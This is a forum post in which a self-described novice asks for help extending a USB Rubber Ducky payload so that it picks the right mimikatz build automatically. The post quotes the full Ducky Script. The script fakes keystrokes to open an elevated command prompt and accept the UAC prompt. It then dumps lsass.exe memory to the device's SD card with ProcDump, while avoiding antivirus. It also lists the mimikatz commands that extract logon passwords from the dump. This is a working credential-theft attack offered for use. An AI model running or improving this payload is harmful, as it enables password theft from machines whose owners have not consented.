Applenuts

* ^ * Note~ I am trying to add something from the Ducky Tool Kit Payload Generator to the above code.

Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimkatz\ProcDump payload. My issue lies in the fact that I have to switch the mimkatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then pluging in, swaping files, and so on. Or having seperate .bins (SHIFT+payload button or CTRL+payload button, ect.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE ***************************************************************************************************************************************************************************** REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card and save log file to disk *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp ENTER REM *** GTFO *** STRING exit ENTER REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> *****************************************************************************************************************************************************************************